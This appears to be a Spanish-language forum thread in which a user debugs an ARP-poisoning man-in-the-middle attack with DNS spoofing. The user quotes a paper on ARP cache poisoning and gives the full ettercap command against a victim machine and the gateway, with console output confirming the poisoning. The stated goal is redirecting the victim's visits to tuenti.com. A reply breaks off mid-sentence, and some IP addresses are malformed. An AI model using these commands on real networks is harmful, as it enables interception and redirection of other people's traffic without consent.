Tras leer el paper que te dejo kamsky (o al menos comenzar a leerlo) vi algo:
Address resolution protocol (ARP) cache poisoning is a MAC layer attack that can only
be carried out when an attacker is connected to the same local network as the target
machines, limiting its effectiveness only to networks connected with switches, hubs, and
bridges; not routers.
Traduccion:
Address Resolution Protocol (ARP) envenenamiento de la caché es un ataque de la capa MAC que sólo puede
llevarse a cabo cuando un atacante está conectado a la misma red local que el objetivo
máquinas, lo que limita su eficacia sólo a las redes conectadas con switches, hubs y
puentes, no routers.
Quizas sea ese el problema, yo estoy intentando tambien hacer el spoof con el siguiente escenario:
pc atacante: 192.168.1.1.129
pc victima: 192.168.1.1.130
Puerta de enlace (
router): 192.168.1.1
hacemos el Mitm, yo estoy usando ettercap:
sudo ettercap -T -i wlan0 -P dns_spoof -M arp /192.168.1.1/ /192.168.1.130/
Listening on wlan0... (Ethernet)
wlan0 -> 00:1C:BF:63:BB:52 192.168.1.129 255.255.255.0
Privileges dropped to UID 65534 GID 65534...
28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services
Scanning for merged targets (2 hosts)...
* |==================================================>| 100.00 %
2 hosts added to the hosts list...
ARP poisoning victims:
GROUP 1 : 192.168.1.1 00:1A:2B:5B:E4:D7
GROUP 2 : 192.168.1.130 00:12:F0:2B:A5:92
Starting Unified sniffing...
Text only Interface activated...
Hit 'h' for inline help
Activating dns_spoof plugin...
y compruebo si se ha realizado con exito el spoof con el plugin chk_poison:
Plugin name (0 to quit): chk_poison
Activating chk_poison plugin...
chk_poison: Checking poisoning status...
chk_poison: Poisoning process succesful!
luego voy a la maquina victima y me meto en tuenti.com (es la direccion que tengo spoofeada por poner un ejemplo asi *.tuenti.* A la dns de google que no recuerdo ahora cual es xD) pero no funciona..el pc victima ingresa correctamente al tuenti :S
Estoy usando tambien un router y claramente en el paper dice que no funciona con routers..podria ser ese el problema no?
Saludos!
Autor
En línea
eso ya lo pasé, entra a una pagina que no hayas visitado nunca y ponle de filtro:
